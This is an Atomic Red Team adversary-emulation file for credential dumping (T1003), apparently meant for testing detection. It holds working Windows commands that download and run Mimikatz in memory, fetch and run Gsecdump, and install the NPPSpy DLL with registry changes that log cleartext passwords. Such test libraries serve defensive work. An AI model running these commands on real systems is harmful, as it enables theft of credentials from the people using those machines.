atomic-red-team/atomics/T1003/T1003.yaml

attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
  auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
  description: |
    Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
    If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
    Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
    Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
  supported_platforms:
  - windows
  input_arguments:
    remote_script:
      description: URL to a remote Mimikatz script that dumps credentials
      type: Url
      default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
  executor:
    command: |
      IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
    name: powershell
    elevation_required: true

- name: Gsecdump
  auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
  description: |
    Dump credentials from memory using Gsecdump.

    Upon successful execution, you should see domain\username's following by two 32 characters hashes.

    If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. 
    You will receive only error output if you do not run this test from an elevated context (run as administrator)

    If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
  supported_platforms:
  - windows
  input_arguments:
    gsecdump_exe:
      description: Path to the Gsecdump executable
      type: Path
      default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
    gsecdump_bin_hash:
      description: File hash of the Gsecdump binary file
      type: String
      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
    gsecdump_url:
      description: Path to download Gsecdump binary file
      type: url
      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Gsecdump must exist on disk at specified location (#{gsecdump_exe})
    prereq_command: |
      if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
      if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
        Move-Item $binpath "#{gsecdump_exe}"
      }
  executor:
    command: |
      #{gsecdump_exe} -a
    name: command_prompt
    elevation_required: true

- name: Credential Dumping with NPPSpy
  auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
  description: |-
    Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
    After user's logging in cleartext password is saved in C:\NPPSpy.txt.
    Clean up deletes the files and reverses Registry changes.
    NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: NPPSpy.dll must be available in local temp directory 
    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
    get_prereq_command: |-
      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
  executor:
    command: |-
      Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
      $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
      $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
      Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
      $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
      $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
      $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
      $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
      $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
      echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
    cleanup_command: |-
      $cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
      $cleanupUpdatedValue = $cleanupPath.PROVIDERORDER 
      $cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
      Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
      Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
      Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
      Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
    name: powershell
    elevation_required: true